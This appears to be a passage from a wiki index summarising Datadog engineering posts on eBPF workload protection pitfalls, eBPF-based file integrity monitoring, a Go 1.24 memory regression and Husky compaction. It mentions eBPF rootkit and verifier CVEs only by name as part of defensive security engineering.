— 5-year operational retrospective on systems/ebpf at Workload Protection scale. Six pitfall classes with mitigations: kernel-version portability (verifier evolution, helper availability, hook-point naming, inlining, dead-code elimination — mitigated by CI matrix + systems/co-re + systems/ebpf-manager + minimum-viable-hook-set gating); syscall-hook coverage (compat syscalls, `raw_tracepoints`, `io_uring`, `binfmt_misc`, interpreters); hooks not firing reliably (kretprobe `maxactive`, HW interrupts, module lifecycle); data-read correctness (kernel-struct drift, paged-out user memory, TOCTOU, path resolution, non-linear `skb`); eBPF map & cache pitfalls (sizing, LRU semantics, `BPF_F_NO_PREALLOC` OOM risk, blocking syscalls pinning entries, lost / out-of-order events); rule-writing (symlinks, hard links, interpreter visibility, syscall-args-≠-shell-commands). Plus: eBPF as attack surface (2021 ebpfkit rootkit PoC; CVE-2023-2163 / CVE-2024-41003 verifier exploits; dedicated `bpf` event type + helper/map inventory + tamper-protection research); multi-tenancy (2022 Datadog × systems/cilium TC-handle-collision incident → patterns/shared-kernel-resource-coordination); performance cost (uprobes ≫ kprobes, `LRU_HASH` vs `PERCPU_ARRAY`, ~95% in-kernel filtering quoted as the reason Workload Protection runs on Datadog's own edge); safe rollout (CI matrix + dogfooding + staged rollout — explicitly framed against the 2024 CrowdStrike incident).
- sources/2025-11-18-datadog-ebpf-fim-filtering
— Scaling real-time file monitoring with eBPF: how Datadog Workload Protection's File Integrity Monitoring filters billions of kernel events per minute. Inputs: ~10B file-related events/min fleet-wide, ~5 KB/event, up to 5K security-relevant syscalls/sec on sensitive workloads. Design: eBPF programs hook file syscalls → ring buffer → user-space Agent rule engine → backend. Two-stage evaluation: (1) in-kernel filtering via eBPF maps — approvers (rule-compile-time-extracted concrete values like `/etc/passwd`) and discarders (runtime-learned LRU negatives like `/tmp` under a `/etc/*` ruleset) — (2) full user-space rule engine on the remainder. ~94% of events dropped in-kernel; ~1M events/min actually forwarded. Framed against legacy alternatives: periodic scans miss tamper-revert and lack change context; `inotify` has no process/container attribution; `auditd` has context but scales poorly.
- sources/2025-07-17-datadog-go-124-memory-regression
— Part 1 of a 2-part Go 1.24 rollout retrospective. A ~20% RSS increase across a data-processing fleet was invisible to Go's `runtime/metrics`; `/proc/[pid]/smaps` localized it to the Go-heap VMA; a live heap profile pointed to large pointer-bearing channels/maps; `heapbench` + `git bisect` landed on the Go 1.24 `mallocgc` refactor (CL 614257), which silently removed a "skip zeroing for OS-fresh memory" optimization for >32 KiB pointer-bearing allocations. Upstream fix (CL 659956) ships in Go 1.25.
- sources/2025-01-29-datadog-husky-efficient-compaction-at-datadog-scale — Husky compaction: columnar fragment format designed for streaming merge, hybrid LSM (size-tiered → locality), trimmed-FSA-regex pruning, FoundationDB atomic fragment-swap transactions. 30% query-worker-fleet reduction from the locality-compaction layer alone.
Skipped articles¶
- Toto time-series foundation model (2024-07-11) — pure ML research announcement, no serving-infra architecture, explicitly "not currently deployed in any production systems" per the post itself. See log entry [2026-04-21 11:17].